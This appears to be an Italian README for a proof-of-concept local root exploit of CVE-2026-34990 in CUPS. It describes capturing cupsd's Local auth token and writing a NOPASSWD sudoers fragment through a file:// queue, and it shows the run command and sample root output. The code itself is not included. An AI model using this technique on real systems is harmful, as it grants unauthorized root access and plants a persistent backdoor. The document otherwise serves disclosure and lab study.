
PoC minimale per CVE-2026-34990: escalatione locale dei privilegi in CUPS <= 2.4.16 che espone il token di autenticazione Local di cupsd e scrive un frammento sudoers NOPASSWD come root.
Privilege escalation locale contro CUPS <= 2.4.16 in esecuzione come root. Sfrutta il token di autenticazione Local di cupsd, quindi scrive un frammento sudoers NOPASSWD come root tramite una coda di stampa file://.
python3 poc.py
In caso di successo:
[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i
Poi:
sudo -i
Questo script è inteso solo a scopo educativo. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo exploit. Assicurati sempre di avere il permesso prima di testare o sfruttare vulnerabilità!